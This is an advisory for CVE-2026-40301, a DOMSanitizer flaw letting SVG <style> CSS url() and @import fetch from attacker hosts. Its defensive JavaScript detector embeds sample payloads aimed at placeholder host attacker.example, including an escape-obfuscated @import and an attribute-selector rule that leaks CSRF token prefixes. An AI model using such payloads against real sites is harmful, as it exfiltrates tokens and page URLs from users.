PT-2026-32980 · Unknown · Domsanitizer

Published 2026-04-10 · Updated 2026-04-18 · CVE-2026-40301

CVSS v3.1: 4.7 (Medium)

Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
Name of the Vulnerable Software and Affected Versions

DOMSanitizer versions prior to 1.0.10

Description

The sanitize() function allows <style> elements in SVG content to pass without inspecting their text content. As a result, CSS url() references and @import rules pass through the sanitizer unfiltered, and a browser rendering the sanitized SVG issues HTTP requests to attacker-controlled hosts. An attacker can use this to exfiltrate the page URL to an external server (the browser sends it in the Referer header of the stylesheet or resource request, subject to the page's referrer policy), to load arbitrary external stylesheets, or, by combining url() with CSS attribute selectors, to exfiltrate values that appear in element attributes, such as a session token in a hidden form field or a cookie value reflected into the markup. A sanitizer that keeps <style> elements must therefore either drop the element or inspect its CSS text for url(), @import and similar fetch-capable constructs.

Recommendations

Update to version 1.0.10 or later.
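The following is an added illustration and not DOMSanitizer's code or its fix: it shows the kind of inspection of <style> text that the vulnerable sanitize() skipped. It scans each <style> element in an SVG string for @import and url() (after resolving CSS escape sequences, which a plain substring check misses), reports attribute selectors of the form used for attribute-value exfiltration, and shows a hardened handling that drops any <style> whose text references an external resource. The function names, the regular expressions and the sample SVG payloads (with placeholder hostname attacker.example) are constructed for this example; the markup handling is regex-based so it runs stand-alone, whereas a real sanitizer should walk the parsed DOM tree.

```javascript
// Added example, not DOMSanitizer's code. All names below are assumptions
// made for this illustration.

// CSS constructs that trigger a network request when the stylesheet applies.
// Deliberately loose (optional whitespace before "(") so it over-matches rather
// than under-matches. Other fetch-capable functions exist, so a denylist is a
// stopgap; dropping the whole <style> element is the safer default.
const EXTERNAL_REF = /@import\b|\burl\s*\(/i;

// Attribute selectors such as input[value^="a"] or [name=token]: the primitive
// behind CSS-based attribute-value exfiltration when combined with url().
const ATTR_SELECTOR = /\[\s*[\w-]+\s*[~|^$*]?=\s*(?:"[^"]*"|'[^']*'|[^\]\s]+)\s*\]/g;

// Resolve CSS escapes (\69 -> "i", \" -> "\"") so that obfuscated tokens like
// "@\69mport" or "\75 rl(" are recognised as @import / url(. A hex escape may
// consume one following whitespace character; U+0000 maps to U+FFFD.
function decodeCssEscapes(css) {
  return css.replace(/\\(?:([0-9a-fA-F]{1,6})[ \t\n\f\r]?|([^\r\n]))/g, (m, hex, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp > 0x10ffff || cp === 0 ? '\uFFFD' : String.fromCodePoint(cp);
  });
}

// Text content of every <style> element in an SVG/HTML string.
function extractStyleBlocks(markup) {
  const blocks = [];
  const re = /<style\b[^>]*>([\s\S]*?)<\/style\s*>/gi;
  let m;
  while ((m = re.exec(markup)) !== null) blocks.push(m[1]);
  return blocks;
}

// True if this stylesheet text would cause a request to an external resource.
function referencesExternal(css) {
  return EXTERNAL_REF.test(decodeCssEscapes(css));
}

// Attribute selectors present in the stylesheet text, after escape decoding.
function findAttributeSelectors(css) {
  return decodeCssEscapes(css).match(ATTR_SELECTOR) || [];
}

// Does any <style> element in this markup issue a request when rendered?
function styleIssuesRequest(markup) {
  return extractStyleBlocks(markup).some(referencesExternal);
}

// Hardened handling: drop every <style> element whose text references an
// external resource; benign styles are kept unchanged.
function stripExternalStyles(markup) {
  return markup.replace(/<style\b[^>]*>([\s\S]*?)<\/style\s*>/gi, (whole, css) =>
    referencesExternal(css) ? '' : whole);
}

// Constructed sample inputs; attacker.example is a placeholder host.
const SAMPLE_SVG =
  '<svg xmlns="http://www.w3.org/2000/svg">' +
  '<style>@import url("https://attacker.example/x.css");</style>' +
  '<style>circle{fill:red}</style>' +
  '<circle r="10"/></svg>';

// Same payload with a CSS escape: a naive substring check sees no "@import".
const ESCAPED_SVG =
  '<svg xmlns="http://www.w3.org/2000/svg">' +
  '<style>@\\69mport "https://attacker.example/y.css";</style></svg>';

// Attribute-selector exfiltration: one rule per guessed prefix of a token value,
// with url() spelled through a hex escape.
const EXFIL_CSS =
  'input[name=csrf][value^="a"]{background:\\75 rl(https://attacker.example/?p=a)}';

if (typeof module !== 'undefined' && require.main === module) {
  console.log(styleIssuesRequest(SAMPLE_SVG), styleIssuesRequest(ESCAPED_SVG));
  console.log(stripExternalStyles(SAMPLE_SVG));
  console.log(findAttributeSelectors(EXFIL_CSS), referencesExternal(EXFIL_CSS));
}
```

The escape-decoding step is the part worth copying: `@\69mport` and `\75 rl(` are valid CSS that the browser reads as `@import` and `url(`, so any check that runs on the raw text is bypassable. Because the denylist can never be complete, the strip function removes the whole element rather than trying to rewrite the offending declaration.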

Fix

XSS

Weakness Enumeration

Related Identifiers

CVE-2026-40301
GHSA-93VF-569F-22CQ

Affected Products

Domsanitizer